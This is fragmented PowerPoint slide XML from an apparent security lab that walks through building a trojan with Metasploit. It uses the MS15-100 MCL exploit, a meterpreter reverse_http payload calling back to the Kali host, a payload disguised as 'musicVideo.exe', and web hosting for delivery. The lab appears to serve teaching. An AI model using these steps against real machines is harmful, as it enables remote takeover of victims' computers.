            <a:ext cx="6428231" cy="10088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7841" y="2181081"/>
            <a:ext cx="3134039" cy="3359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0386" y="2181081"/>
            <a:ext cx="3135684" cy="3359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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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0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" y="568960"/>
            <a:ext cx="8551171" cy="1565233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196" y="703015"/>
            <a:ext cx="6436765" cy="10088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0255" y="2181083"/>
            <a:ext cx="2935408" cy="646926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196" y="2828009"/>
            <a:ext cx="3142575" cy="2712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97137" y="2181081"/>
            <a:ext cx="2935825" cy="645938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90387" y="2828009"/>
            <a:ext cx="3142574" cy="2712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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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48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" y="568960"/>
            <a:ext cx="8551171" cy="1565233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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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1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202736" y="1841711"/>
            <a:ext cx="1348435" cy="13465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196718" y="568960"/>
            <a:ext cx="1337682" cy="1276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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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5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568960"/>
            <a:ext cx="8551171" cy="1565233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196" y="703012"/>
            <a:ext cx="6436765" cy="1008877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr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0093" y="2181083"/>
            <a:ext cx="3652869" cy="3359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841" y="2181082"/>
            <a:ext cx="2609824" cy="3359363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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9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568960"/>
            <a:ext cx="8551171" cy="1565233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196" y="703013"/>
            <a:ext cx="6436765" cy="1008875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr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76893" y="2181082"/>
            <a:ext cx="3656069" cy="3359358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196" y="2181083"/>
            <a:ext cx="2611921" cy="3359361"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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861B-55D1-4841-8648-7B4FF0205353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F272-0096-499C-A25A-02BC3C9B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8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8534400" cy="64008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6196" y="703013"/>
            <a:ext cx="6436765" cy="100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840" y="2181081"/>
            <a:ext cx="6428230" cy="3359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10022" y="5540443"/>
            <a:ext cx="192024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7841" y="5540444"/>
            <a:ext cx="4512361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25360" y="703013"/>
            <a:ext cx="1080496" cy="10180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81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33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75D147-D47A-48D6-AFAF-E1105B23E588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Backdoor/Trojan 1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7A3E2-396B-4E9B-A2BE-FDD00B80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Find the IP Address (Windows Machine)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C6F33-23C8-447C-A3D1-75BF22A87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64"/>
              <a:t>Select the Start button (Windows Machine) and search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t> (Command Prompt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t>Use the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t>Search for the IPv4 Address line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764"/>
              <a:t>Write down the Windows IP Address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B7315-3B6A-4EEE-8203-DC957236A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292" y="3698674"/>
            <a:ext cx="2085233" cy="2629883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DAE840-3BCB-4B7E-A3E0-50FE3285C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097" y="3200400"/>
            <a:ext cx="3379563" cy="2085921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3B9F3C3-8F8F-44AB-B113-F1EA59FE91D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331266" y="4140081"/>
            <a:ext cx="738899" cy="226134"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="254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269673"/>
            <a:endParaRPr lang="en-US" sz="1045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43D435-BC90-488F-834F-5D0BC1F48FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6462049" y="5498136"/>
            <a:ext cx="1206304" cy="174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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="915" i="1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7F9C29-D86B-484F-84DB-17E91EF15656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6861985" y="4372149"/>
            <a:ext cx="203215" cy="1061185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073194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0854-C984-4173-AF32-C3E403ED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Initialize Metasploit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D9FD9-9EEE-4872-82A7-63A6EE8C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" y="1670788"/>
            <a:ext cx="7567168" cy="2770301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Metasploit with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo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r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>You should notice that Metasploit console has started and you should now see: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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2A513D-44E8-4D4B-8894-34B80E5EC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25" y="3545559"/>
            <a:ext cx="4130583" cy="9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21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7508-1B8C-4674-A7EF-A074E249F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 the Backdoor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30718-BBC5-40D2-A86C-9330C9A95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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tell Metasploit to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MS15 - MCL Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ms15_100_mcl_exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Look at the information for this attack with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Notice the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FILENAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>will be the MCL file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FILE_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> will be the malicious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14A47-D8F0-4C5F-8D65-DC8150590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663" y="3455984"/>
            <a:ext cx="2827737" cy="1757129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812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A53DE-0B40-4711-8077-2B93D2A6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w Cen MT"/>
              </a:rPr>
              <a:t>Setup the Backdoor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F421-6420-42F0-B7F9-0937F8D18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39" y="1792175"/>
            <a:ext cx="7842885" cy="367517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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set the local host to listen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali_IP_Address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Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Change the name of the MCL file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set FILENAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>musicVideo.mcl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Change the name of the malicious file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set FILE_NAME musicVideo.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set the payload using the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier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45307F-4A59-44FE-A0B0-F79EA494D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318" y="1365805"/>
            <a:ext cx="4112306" cy="689346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0871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7124E06-8D4D-42DE-B1C1-B5A0E5503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123" y="2115533"/>
            <a:ext cx="5100025" cy="2597868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A9EAF9-D8D4-4D30-99F7-0DDBDC76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 the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18363-64F5-467F-81C0-142B18293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616" y="1687399"/>
            <a:ext cx="7567168" cy="514759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Check to make sure everything was updated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2156" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1764" b="1">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0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0E3577-DEBF-47E4-B1D3-40C44D049FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948372" y="2115457"/>
            <a:ext cx="1206304" cy="4559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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILENAME was updated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="915" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>musicVideo.mcl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="915" i="1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939BAF-7D0E-4F0E-BCC4-17FC0D1273F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54676" y="2343426"/>
            <a:ext cx="410905" cy="426408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5645DB8-70D0-4C6D-88EC-51B162108A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926644" y="2715230"/>
            <a:ext cx="1249757" cy="4559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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILE_NAME was updated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="915" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>musicVideo.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1045" i="1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D0111F-2726-45C9-B5DA-80732183B9EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2360129" y="2948932"/>
            <a:ext cx="416833" cy="54571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793905-83F6-4E17-8B98-8BB46D2DB52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604024" y="4216559"/>
            <a:ext cx="1557541" cy="3151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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LHOST was updated to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="915" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali Linux IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1045" i="1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C30D94-83EF-4435-A1E7-24FE0410896A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161565" y="4374124"/>
            <a:ext cx="505602" cy="0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C2EAB9A-8DB5-4109-9990-D96CE4C73CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207063" y="3227236"/>
            <a:ext cx="1969339" cy="4559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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload set to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="915" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="915" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="915">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier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A5E613-1BDC-4EF9-9840-6A77C8A6257A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176402" y="3455205"/>
            <a:ext cx="1400769" cy="353024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118454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A319-0EB0-4241-999B-29E50036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 the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96710-124C-46FF-8260-9343359FC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616" y="1687400"/>
            <a:ext cx="7567168" cy="858151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To start the attack, use the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit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AC4152-6A16-4226-9357-F52BF8D73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500" y="2458863"/>
            <a:ext cx="4634411" cy="1011520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BEAE4C-030C-41F3-B50F-D856788690AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483616" y="3812770"/>
            <a:ext cx="7567168" cy="858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3352" indent="-213352" algn="l" defTabSz="8534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2613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40057" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="224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66762" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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93467" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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20171" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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346876" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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73581" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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6" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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26990" indent="-213352" algn="l" defTabSz="853410" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="467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/>
              <a:t>The attack is running/listening, waiting for the target to execute the malicious file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176603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28EF-E019-45D8-B0F0-CD8F356F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Install the Trojan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D2004-2B50-4C95-99F0-A2E4F1413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set the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trojan file to be hosted on a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Terminal in Kali (Leave the other Terminal running)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make yourself a root user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -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7450E9F-F547-4A65-A262-D326489AD4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586740" y="4430681"/>
            <a:ext cx="5038357" cy="1137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6595" tIns="16595" rIns="16595" bIns="16595" anchor="t">
            <a:normAutofit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sz="2091" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a “music” directory in the apache web server folder:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1960" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /var/www/html/music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513989-F397-4A07-9F3D-AA3C735D2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817" y="3200400"/>
